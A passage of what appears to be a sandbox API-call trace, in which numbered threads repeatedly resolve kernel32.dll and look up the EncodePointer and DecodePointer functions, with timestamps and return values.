(in: pbstr=0xc10f9b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc10f9b0*="KERNEL32.DLL") returned 1 [0151.624] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.625] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.629] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0151.633] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0151.819] SysReAllocStringLen (in: pbstr=0xc10fc88*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xc10fc88*="KERNEL32.DLL") returned 1 [0151.819] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0151.827] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0151.835] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 158 os_tid = 0x570 [0153.137] SysReAllocStringLen (in: pbstr=0x732f594*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f594*="KERNEL32.DLL") returned 1 [0153.137] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0153.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.140] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0153.141] SysReAllocStringLen (in: pbstr=0x732f594*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f594*="KERNEL32.DLL") returned 1 [0153.141] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0153.141] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.144] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0153.144] SysReAllocStringLen (in: pbstr=0x732f570*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f570*="KERNEL32.DLL") returned 1 [0153.144] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0153.144] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0153.147] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0153.149] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0154.629] SysReAllocStringLen (in: pbstr=0x732f848*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f848*="KERNEL32.DLL") returned 1 [0154.629] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0154.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0154.632] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 160 os_tid = 0x520 [0154.445] SysReAllocStringLen (in: pbstr=0x964f694*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x964f694*="KERNEL32.DLL") returned 1 [0154.446] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0154.455] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0154.460] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0154.461] SysReAllocStringLen (in: pbstr=0x964f694*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x964f694*="KERNEL32.DLL") returned 1 [0154.461] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0154.461] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0154.465] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0154.465] SysReAllocStringLen (in: pbstr=0x964f670*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x964f670*="KERNEL32.DLL") returned 1 [0154.465] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0154.465] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0154.468] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0154.471] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0154.634] SysReAllocStringLen (in: pbstr=0x964f948*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x964f948*="KERNEL32.DLL") returned 1 [0154.634] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0154.634] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0154.637] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 165 os_tid = 0x53c [0156.628] SysReAllocStringLen (in: pbstr=0x957f9e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x957f9e4*="KERNEL32.DLL") returned 1 [0156.628] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.631] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.632] SysReAllocStringLen (in: pbstr=0x957f9e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x957f9e4*="KERNEL32.DLL") returned 1 [0156.632] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.632] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.635] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0156.635] SysReAllocStringLen (in: pbstr=0x957f9c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x957f9c0*="KERNEL32.DLL") returned 1 [0156.635] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0156.636] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0156.639] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0156.642] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0158.440] SysReAllocStringLen (in: pbstr=0x957fc98*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x957fc98*="KERNEL32.DLL") returned 1 [0158.440] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0158.441] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.444] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 173 os_tid = 0xae8 [0158.849] SysReAllocStringLen (in: pbstr=0x969f684*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f684*="KERNEL32.DLL") returned 1 [0158.849] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0158.850] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.854] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0158.854] SysReAllocStringLen (in: pbstr=0x969f684*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f684*="KERNEL32.DLL") returned 1 [0158.854] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0158.855] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.858] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0158.858] SysReAllocStringLen (in: pbstr=0x969f660*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f660*="KERNEL32.DLL") returned 1 [0158.858] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0158.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.862] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0158.865] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0158.970] SysReAllocStringLen (in: pbstr=0x969f938*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x969f938*="KERNEL32.DLL") returned 1 [0158.970] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0158.979] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0158.981] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 176 os_tid = 0xae8 Thread: id = 177 os_tid = 0x4e8 [0161.136] SysReAllocStringLen (in: pbstr=0x955f664*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f664*="KERNEL32.DLL") returned 1 [0161.136] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0161.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0161.151] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0161.152] SysReAllocStringLen (in: pbstr=0x955f664*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f664*="KERNEL32.DLL") returned 1 [0161.152] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0161.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0161.155] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0161.155] SysReAllocStringLen (in: pbstr=0x955f640*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f640*="KERNEL32.DLL") returned 1 [0161.155] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0161.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0161.158] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0161.160] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0161.255] SysReAllocStringLen (in: pbstr=0x955f918*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f918*="KERNEL32.DLL") returned 1 [0161.255] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0161.256] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0161.258] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 178 os_tid = 0x40c [0166.102] SysReAllocStringLen (in: pbstr=0x955f484*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f484*="KERNEL32.DLL") returned 1 [0166.102] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.105] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.107] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.108] SysReAllocStringLen (in: pbstr=0x955f484*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f484*="KERNEL32.DLL") returned 1 [0166.108] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.111] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.111] SysReAllocStringLen (in: pbstr=0x955f460*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f460*="KERNEL32.DLL") returned 1 [0166.111] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.114] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0166.116] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.819] SysReAllocStringLen (in: pbstr=0x955f738*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f738*="KERNEL32.DLL") returned 1 [0166.819] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.820] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.823] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 179 os_tid = 0x6a8 [0166.887] SysReAllocStringLen (in: pbstr=0x96af754*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96af754*="KERNEL32.DLL") returned 1 [0166.887] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.890] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.890] SysReAllocStringLen (in: pbstr=0x96af754*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96af754*="KERNEL32.DLL") returned 1 [0166.890] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.891] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.893] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.894] SysReAllocStringLen (in: pbstr=0x96af730*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96af730*="KERNEL32.DLL") returned 1 [0166.894] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.897] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0166.900] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.488] SysReAllocStringLen (in: pbstr=0x96afa08*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x96afa08*="KERNEL32.DLL") returned 1 [0167.489] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.489] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.492] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 180 os_tid = 0x3c4 [0166.901] SysReAllocStringLen (in: pbstr=0xbc8f664*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbc8f664*="KERNEL32.DLL") returned 1 [0166.901] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.905] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.905] SysReAllocStringLen (in: pbstr=0xbc8f664*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbc8f664*="KERNEL32.DLL") returned 1 [0166.905] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.906] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.908] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0166.909] SysReAllocStringLen (in: pbstr=0xbc8f640*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbc8f640*="KERNEL32.DLL") returned 1 [0166.909] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0166.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0166.912] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0166.915] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.495] SysReAllocStringLen (in: pbstr=0xbc8f918*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbc8f918*="KERNEL32.DLL") returned 1 [0167.495] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.499] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 181 os_tid = 0x6c8 [0167.119] SysReAllocStringLen (in: pbstr=0xbd8fa74*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbd8fa74*="KERNEL32.DLL") returned 1 [0167.119] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.121] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.126] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.127] SysReAllocStringLen (in: pbstr=0xbd8fa74*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbd8fa74*="KERNEL32.DLL") returned 1 [0167.127] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.133] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0167.133] SysReAllocStringLen (in: pbstr=0xbd8fa50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbd8fa50*="KERNEL32.DLL") returned 1 [0167.133] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0167.134] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0167.138] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0167.142] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0169.107] SysReAllocStringLen (in: pbstr=0xbd8fd28*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xbd8fd28*="KERNEL32.DLL") returned 1 [0169.107] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0169.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0169.123] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 182 os_tid = 0xb40 [0173.581] SysReAllocStringLen (in: pbstr=0x955f3ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f3ac*="KERNEL32.DLL") returned 1 [0173.581] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0173.581] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0173.584] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0173.584] SysReAllocStringLen (in: pbstr=0x955f3ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f3ac*="KERNEL32.DLL") returned 1 [0173.584] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0173.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0173.587] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0173.588] SysReAllocStringLen (in: pbstr=0x955f388*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f388*="KERNEL32.DLL") returned 1 [0173.588] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0173.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0173.590] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0173.593] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0173.597] SysReAllocStringLen (in: pbstr=0x955f660*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x955f660*="KERNEL32.DLL") returned 1 [0173.597] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0173.597] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0173.599] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 184 os_tid = 0x6c8 Thread: id = 185 os_tid = 0x75c [0174.633] SysReAllocStringLen (in: pbstr=0x963f3fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x963f3fc*="KERNEL32.DLL") returned 1 [0174.633] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.634] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.640] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.640] SysReAllocStringLen (in: pbstr=0x963f3fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x963f3fc*="KERNEL32.DLL") returned 1 [0174.641] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.641] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.644] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.645] SysReAllocStringLen (in: pbstr=0x963f3d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x963f3d8*="KERNEL32.DLL") returned 1 [0174.645] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.645] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.649] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0174.652] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.736] SysReAllocStringLen (in: pbstr=0x963f6b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x963f6b0*="KERNEL32.DLL") returned 1 [0174.736] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.737] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.740] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 186 os_tid = 0x710 [0174.658] SysReAllocStringLen (in: pbstr=0x732f65c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f65c*="KERNEL32.DLL") returned 1 [0174.658] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.659] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.662] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.662] SysReAllocStringLen (in: pbstr=0x732f65c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f65c*="KERNEL32.DLL") returned 1 [0174.662] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.663] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.666] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.666] SysReAllocStringLen (in: pbstr=0x732f638*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f638*="KERNEL32.DLL") returned 1 [0174.666] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.667] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.670] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0174.673] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0175.062] SysReAllocStringLen (in: pbstr=0x732f910*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x732f910*="KERNEL32.DLL") returned 1 [0175.062] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0175.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0175.065] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 187 os_tid = 0xb1c [0174.944] SysReAllocStringLen (in: pbstr=0x5fcf8d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fcf8d4*="KERNEL32.DLL") returned 1 [0174.944] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.945] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.948] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.948] SysReAllocStringLen (in: pbstr=0x5fcf8d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fcf8d4*="KERNEL32.DLL") returned 1 [0174.949] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.949] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.952] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.952] SysReAllocStringLen (in: pbstr=0x5fcf8b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fcf8b0*="KERNEL32.DLL") returned 1 [0174.952] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.953] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.956] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0174.959] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 188 os_tid = 0x968 [0177.431] SysReAllocStringLen (in: pbstr=0x72ef9ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef9ac*="KERNEL32.DLL") returned 1 [0177.432] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.435] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.435] SysReAllocStringLen (in: pbstr=0x72ef9ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef9ac*="KERNEL32.DLL") returned 1 [0177.435] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.436] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.438] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.438] SysReAllocStringLen (in: pbstr=0x72ef988*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72ef988*="KERNEL32.DLL") returned 1 [0177.438] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.441] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0177.443] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0177.445] SysReAllocStringLen (in: pbstr=0x72efc60*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x72efc60*="KERNEL32.DLL") returned 1 [0177.445] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0177.445] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0177.448] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 189 os_tid = 0x150 [0179.663] 